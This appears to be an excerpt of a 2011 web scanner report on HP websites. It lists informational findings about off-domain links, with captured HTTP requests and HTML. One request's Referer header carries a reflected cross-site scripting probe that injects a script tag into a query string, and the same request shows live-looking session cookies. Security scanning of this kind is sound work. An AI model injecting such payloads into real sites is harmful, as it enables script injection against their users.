<a href="/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/49717/Explore_color_modes_Photoshop_CS4_64x64.jpg?v=1281735207000" alt="Exploring color modes in Adobe.. Photoshop.. CS4 (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/40527/Intermediate_website_design_64x64.jpg?v=1281721718000" alt="Intermediate website design" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/33169/jump-start_your_creativity_64x64.jpg?v=1281719082000" alt="Jump-start your creativity: exploring Leonardo da Vinci's notebooks" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/48894/Photoshop_101_image_size_and_resolution_basics_64x64.jpg?v=1281728528000" alt="Photoshop 101: image size and resolution basics (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640&hplcpsession.id=a298d08ec5e5c2178710c2738c2c"><img src="http://hplc-prod.s3.amazonaws.com/media/49070/Print_marketing_materials_in-house_on_a_wide-format_printer_64x64.jpg?v=1281731127000" alt="Print marketing materials in-house on a wide-format printer" border="0"/></a>
...[SNIP]...
bso/busproducts_handhelds.html?jumpid=re_R11575_learnctr_bottomnav_handhelds" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104907');">
<img
width="64"
height="64"
border="0"
alt="SmartPhones &amp; Handhelds"
src="http://hplc-prod.s3.amazonaws.com/media/50281/pixi_smartphone_64.jpg?v=1288625644000"
/>

</a>
...[SNIP]...
/sbso/busproducts_monitors.html?jumpid=re_R11575_learnctr_bottomnav_monitors" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104908');">
<img
width="64"
height="64"
border="0"
alt="Monitors &amp; Accessories"
src="http://hplc-prod.s3.amazonaws.com/media/45874/hho-monitors_64.jpg?v=1288625643000"
/>

</a>
...[SNIP]...
bso/busproducts_notebooks.html?jumpid=re_R11575_learnctr_bottomnav_notebooks" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104904');">
<img
width="64"
height="64"
border="0"
alt="Laptops Tablets &amp; Netbooks"
src="http://hplc-prod.s3.amazonaws.com/media/46287/ent-elitebook_64.jpg?v=1288625644000"
/>

</a>
...[SNIP]...
/sbso/busproducts_printing.html?jumpid=re_R11575_learnctr_bottomnav_printing" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104911');">
<img
width="64"
height="64"
border="0"
alt="Printers &amp; Multifunction solutions"
src="http://hplc-prod.s3.amazonaws.com/media/50465/print_multi_64.jpg?v=1288625643000"
/>

</a>
...[SNIP]...
om/sbso/busproducts_storage.html?jumpid=re_R11575_learnctr_bottomnav_storage" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104915');">
<img
width="64"
height="64"
border="0"
alt="Storage"
src="http://hplc-prod.s3.amazonaws.com/media/45790/san_64.jpg?v=1288625644000"
/>

</a>
...[SNIP]...
olutions/pc_expertise/pos/index.html?jumpid=re_R11575_learnctr_bottomnav_pos" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104910');">
<img
width="64"
height="64"
border="0"
alt="Point of Sale Systems"
src="http://hplc-prod.s3.amazonaws.com/media/50464/POS_64.jpg?v=1288625643000"
/>

</a>
...[SNIP]...

<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js"></script>
...[SNIP]...

9.3. http://h30187.www3.hp.com/howto_QL_courses.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/howto_QL_courses.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://h30187.www3.hp.com/howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create

The response contains the following links to other domains:

http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000
http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50483/desktops_64.jpg?v=1288625342000
http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg?v=1288625341000
http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg?v=1288625341000
http://hplc-prod.s3.amazonaws.com/media/50603/Microsoft_Excel_2010_Take_a_tour_of_the_interface_and_basic_skills_180x110_play.jpg?v=1291754008000
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css
http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css
http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/js/hpweb_soctag.js

Request

Response

9.4. http://h30187.www3.hp.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/index.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://h30187.www3.hp.com/index.jsp?tab=atWork&mcid=explore-create

The response contains the following links to other domains:

http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://hplc-prod.s3.amazonaws.com/media/18533/it_camp.jpg?v=1281716318000
http://hplc-prod.s3.amazonaws.com/media/38107/Save_money_while_becoming_energy_efficient_180x110.jpg?v=1308603474000
http://hplc-prod.s3.amazonaws.com/media/38707/msoffice_adobe.jpg?v=1281721869000
http://hplc-prod.s3.amazonaws.com/media/44587/desktops-workstations_64.jpg?v=1288625644000
http://hplc-prod.s3.amazonaws.com/media/45788/tower-servers_64.jpg?v=1288625643000
http://hplc-prod.s3.amazonaws.com/media/45790/san_64.jpg?v=1288625644000
http://hplc-prod.s3.amazonaws.com/media/46052/pc-security-work.jpg?v=1281723268000
http://hplc-prod.s3.amazonaws.com/media/46053/business-basics.jpg?v=1281723268000
http://hplc-prod.s3.amazonaws.com/media/50463/thin_client100x100_64.jpg?v=1288625644000
http://hplc-prod.s3.amazonaws.com/media/50464/POS_64.jpg?v=1288625643000
http://hplc-prod.s3.amazonaws.com/media/50466/scanner_64.gif?v=1288625643000
http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css
http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css
http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/js/hpweb_soctag.js

Request

GET /index.jsp?tab=atWork&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.5. https://h30248.www3.hp.com/recycle/supplies/index.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30248.www3.hp.com
Path:	/recycle/supplies/index.asp

Issue detail

The page was loaded from a URL containing a query string:

https://h30248.www3.hp.com/recycle/supplies/index.asp?jumpid=in_R329_prodexp/hhoslp/footer_recycle_ink_toner

The response contains the following links to other domains:

https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif
https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif
https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif
https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif
https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif
https://secure.hp-ww.com/country/us/en/js/hpweb_utilities.js
https://secure.hp-ww.com/country/us/en/js/metricsNAUSmktg.js
https://secure.hp-ww.com/country/us/en/noscript.html
https://secure.hp-ww.com/img/hpweb_1-2_prnt_icn.gif
https://secure.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
https://secure.hp-ww.com/img/s.gif

Request

GET /recycle/supplies/index.asp?jumpid=in_R329_prodexp/hhoslp/footer_recycle_ink_toner HTTP/1.1
Host: h30248.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 30 Jun 2011 11:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 26506
Content-Type: text/html
Expires: Wed, 29 Jun 2011 11:50:08 GMT
Set-Cookie: ASPSESSIONIDQAVDCCAQ=GFCFDEDAFFAJMAGIDOGPBLKE; secure; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>


   <title>HP supplies recycling program</title>

   <meta http-
...[SNIP]...
</script>

   <script type="text/javascript" language="JavaScript" src="https://secure.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<a href="#jumptocontent"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="1" alt="Jump to content" border="0"></a><noscript><a href="https://secure.hp-ww.com/country/us/en/noscript.html">summary of site-wide JavaScript functionality</a>
...[SNIP]...
<td><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="24" alt="" border="0"></td>
...[SNIP]...
<td><img src="https://secure.hp-ww.com/img/s.gif" width="20" height="1" alt=""></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif" width="100" height="24" border="0" alt="HP.com Home"></a></td>
                   <td class="colorE7E7E7bg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
                   <td><a href="http://welcome.hp.com/country/us/en/prodserv.html"><img src="https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif" width="166" height="24" border="0" alt="Products and Services"></a></td>
                   <td class="colorE7E7E7bg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
                   <td><a href="http://welcome.hp.com/country/us/en/support.html"><img src="https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif" width="163" height="24" border="0" alt="Support and Drivers"></a></td>
                   <td class="colorE7E7E7bg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
                   <td><a href="http://welcome.hp.com/country/us/en/solutions.html"><img src="https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif" width="143" height="24" border="0" alt="Solutions"></a></td>
                   <td class="colorE7E7E7bg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
                   <td><a href="http://welcome.hp.com/country/us/en/howtobuy.html"><img src="https://secure.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif" width="143" height="24" border="0" alt="How to Buy"></a></td>
                   <td class="colorE7E7E7bg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
...[SNIP]...
<td width="20" valign="top"><img src="https://secure.hp-ww.com/img/s.gif" width="20" height="48" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="4"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td valign="top"><img src="https://secure.hp-ww.com/img/s.gif" width="4" height="1" alt="" class="decoration"></td>
...[SNIP]...
<input type="text" name="qt" size="26" maxlength="100" id="textbox1" alt="Enter search criteria here"><img src="https://secure.hp-ww.com/img/s.gif" width="4" height="1" alt=""><a id="country" onmouseover="status='search using the specified criteria';return true;" onmouseout="status='';return true;" onFocus="status='search using the specified criteria';return true;" onBlur="s
...[SNIP]...
<td align="left"><img src="https://secure.hp-ww.com/img/s.gif" width="20" height="1" alt="" class="decoration"></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="https://secure.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="HP.com home" border="0"></a>
...[SNIP]...
<td width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="93" alt=""></td>
...[SNIP]...
<br>
       <img src="https://secure.hp-ww.com/img/s.gif" width="1" height="6" alt=""><h1>
...[SNIP]...
<td align="left" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
                               <td align="left" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
                               <td align="left" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
                               <td align="left" width="120"><img src="https://secure.hp-ww.com/img/s.gif" width="120" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="https://secure.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
                               <td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="https://secure.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="https://secure.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3" class="colorCCCCCCbg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<a name="jumptocontent"><img src="https://secure.hp-ww.com/img/s.gif" width="10" height="1" alt="Content starts here"></a>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
</table>

   <img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""><br>
...[SNIP]...
<br><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""><br>
...[SNIP]...
<td colspan="2" class="theme"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="5" alt=""></td>
...[SNIP]...
<td class="theme"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="5" alt=""></td>
...[SNIP]...
<td colspan="2" class="theme"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="5" alt=""></td>
...[SNIP]...
<td colspan="5">
   <img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""><br>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3" class="colorCCCCCCbg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="https://secure.hp-ww.com/img/hpweb_1-2_prnt_icn.gif" width="19" height="13" alt="" border="0"><a href="index.asp?printable=true" class="udrlinebold">
...[SNIP]...
<td width="560"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="60" alt="" border="0"></td>
...[SNIP]...
<td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="1" alt="" border="0"></td>
...[SNIP]...
<td width="560"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<td class="color666666bg"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0"></td>
...[SNIP]...
<td colspan="4"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0"></td>
...[SNIP]...
<td colspan="4"><img src="https://secure.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...

<script type="text/javascript" language="JavaScript" src="https://secure.hp-ww.com/country/us/en/js/metricsNAUSmktg.js"></script>
...[SNIP]...

9.6. https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://h30406.www3.hp.com
Path:	/campaigns/2011/promo/1-9XZBS/index.php

Issue detail

The page was loaded from a URL containing a query string:

https://h30406.www3.hp.com/campaigns/2011/promo/1-9XZBS/index.php?&mcc=HBPQ&jumpid=ex_r2548/us/mar11/ent/eb-ts/1-9XZBS/mcc

The response contains the following links to other domains:

https://secure.hp-ww.com/country/us/en/js/hpweb_utilities.js
https://secure.hp-ww.com/country/us/en/js/metricsNAentmktg.js
https://secure.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 30 Jun 2011 11:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
X-Powered-By: PHP/4.3.8
Set-Cookie: regioncodecookie=NA; expires=Thu, 30-Jun-2011 11:51:09 GMT; path=/; domain=.hp.com
Set-Cookie: sub_jumpid=ex_r2548%2Fus%2Fmar11%2Fent%2Feb-ts%2F1-9XZBS%2Fmcc; path=/; domain=h30406.www3.hp.com
Set-Cookie: sub_jumpid=ex_r2548%2Fus%2Fmar11%2Fent%2Feb-ts%2F1-9XZBS%2Fmcc; path=/; domain=h30406.www3.hp.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:v="urn:schema
...[SNIP]...
<link rel="stylesheet" type="text/css" href="css/style.css" />-->
<script type="text/javascript" src="https://secure.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="https://secure.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css" />

<SCRIPT type="text/javascript" src="https://secure.hp-ww.com/country/us/en/js/metricsNAentmktg.js"></SCRIPT>
...[SNIP]...

9.7. http://h30415.www3.hp.com/ModColumnStories_dsp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/ModColumnStories_dsp.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://h30415.www3.hp.com/ModColumnStories_dsp.jsp?&nsid=a-4d123106:130e2c22257:1896&rdm=62917.54953563213

The response contains the following links to other domains:

http://hpcorp.i.feedroom.com/t_assets/hpcorp/20100514/8c6e0055a5ba8e81918f1acc5c51376e5ecde38b.jpg
http://hpproserv.i.feedroom.com/t_assets/hpproserv/20110212/e0f9e1141995ea48e753781eaadc37628ed270f1.jpg
http://hpproserv1.i.feedroom.com/t_assets/hpproserv1/20091014/e6965e7c39d72f5e589367f2c75a79fd4a6f774e.jpg
http://hpproserv1.i.feedroom.com/t_assets/hpproserv1/20100716/b4eb14ebd16ece931874270b206b756f6842a1a2.jpg
http://hpstaging.i.feedroom.com/t_assets/hpstaging/20110212/26f1ed1e1e4d1594afb03bbf9e233eccc7dfa0c9.jpg
http://hpstaging.i.feedroom.com/t_assets/hpstaging/20110316/5ca7b3d7339cb6ac45170a7e0b57e151ae1da328.jpg
http://hpstaging.i.feedroom.com/t_assets/hpstaging/20110330/4e1468ac17b0cb49cb7dc96a0a66a13c3103754f.jpg
http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110124/33f2c51d07023ab0cedd6e65ad26bb77815b2bab.jpg
http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110218/fe05d4367d18c8de3c3fdf6c26e6fa4ef7bbaee5.jpg
http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110303/71eda34ac342a43de987e11acd924f21d2e8da08.jpg
http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110310/4e0fdeccfb554cb371f4919da38cd08be7ba31d9.jpg
http://hptv.i.feedroom.com/t_assets/hpcorp1/20110304/db32f16b59c1d05eb18353fa044be896ca3c6391.jpg

Request

GET /ModColumnStories_dsp.jsp?&nsid=a-4d123106:130e2c22257:1896&rdm=62917.54953563213 HTTP/1.1
Host: h30415.www3.hp.com
Proxy-Connection: keep-alive
Referer: http://h30415.www3.hp.com/index.jsp?78db3%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec7cb7310b63=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcompc_usen=cartExists=false; hp_cust_seg_sel=HHO; jumpstack=%5B%5B'ex_r329_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_accessories_ql'%2C'1309434425265'%5D%5D; EMID=; hpjidc=37; bn_u=6923614956829433945; s_vi=[CS]v1|2706312D0501146A-60000108C016BD51[CE]; bnTrail=%5B%22http%3A%2F%2Fwww8.hp.com%2Fus%2Fen%2Fhome.html%3Fjumpid%3Dex_r163_us%2Fen%2Fany%2Fpsg%2Fnimble_msn-ot-li_chev%2Fhp_promos_ql%22%5D; lang=en-us; cc=us; ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt; prop12=r11469; s_depth=1; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x8

Response

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2011 01:19:35 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Expires: Mon, 06 Jan 1974 00:00:01 GMT
Cache-Control: no-store, no-cache, private, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref='/w3c/p3p.xml', CP='NOI NID OUR NOR UNI'
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding,User-Agent
Content-Length: 11576

<div class="stories_box">
<div class="stories_flow" id="divStoriesFlow">
<div class="story" id="story0" onclick="highlightNowPlaying=true;AdminAB('playStory',1,['0','0','041faece07a9aaf376ab9056f
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile0" class="stories_tiles_tile" src="http://hpproserv.i.feedroom.com/t_assets/hpproserv/20110212/e0f9e1141995ea48e753781eaadc37628ed270f1.jpg" alt="HP Anthem TV Ad: Music by Lou Reed" title="HP Anthem TV Ad: Music by Lou Reed" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile1" class="stories_tiles_tile" src="http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110310/4e0fdeccfb554cb371f4919da38cd08be7ba31d9.jpg" alt="HP Brand Film" title="HP Brand Film" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile2" class="stories_tiles_tile" src="http://hpstaging.i.feedroom.com/t_assets/hpstaging/20110212/26f1ed1e1e4d1594afb03bbf9e233eccc7dfa0c9.jpg" alt="Alicia Keys Commercial" title="Alicia Keys Commercial" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile3" class="stories_tiles_tile" src="http://hpproserv1.i.feedroom.com/t_assets/hpproserv1/20100716/b4eb14ebd16ece931874270b206b756f6842a1a2.jpg" alt="E-mail prints directly to your printer" title="E-mail prints directly to your printer" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile4" class="stories_tiles_tile" src="http://hpstaging.i.feedroom.com/t_assets/hpstaging/20110316/5ca7b3d7339cb6ac45170a7e0b57e151ae1da328.jpg" alt="Every passion has a laugh" title="Every passion has a laugh" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile5" class="stories_tiles_tile" src="http://hptv.i.feedroom.com/t_assets/hpcorp1/20110304/db32f16b59c1d05eb18353fa044be896ca3c6391.jpg" alt="Social Innovation at HP" title="Social Innovation at HP" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile6" class="stories_tiles_tile" src="http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110303/71eda34ac342a43de987e11acd924f21d2e8da08.jpg" alt="Global Solutions for a Better Tomorrow" title="Global Solutions for a Better Tomorrow" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile7" class="stories_tiles_tile" src="http://hpstaging1.i.feedroom.com/t_assets/hpstaging1/20110124/33f2c51d07023ab0cedd6e65ad26bb77815b2bab.jpg" alt="HP Hybrid Delivery Cloud Solutions" title="HP Hybrid Delivery Cloud Solutions" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile8" class="stories_tiles_tile" src="http://hpstaging.i.feedroom.com/t_assets/hpstaging/20110330/4e1468ac17b0cb49cb7dc96a0a66a13c3103754f.jpg" alt="Color says what you're about faster" title="Color says what you're about faster" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
<a href="javascript:void(0)" class="story_link" onfocus="blur()"><img id="storyTile9" class="stories_tiles_tile" src="http://hpproserv1.i.feedroom.com/t_assets/hpproserv1/20091014/e6965e7c39d72f5e589367f2c75a79fd4a6f774e.jpg" alt="Peace of Mind for your New PC" title="Peace of Mind for your New PC" onerror='this.src="http://hpgateway.i.feedroom.com/affiliate/_common/ti_static.gif?ver=2011030401"'/></a>
...[SNIP]...
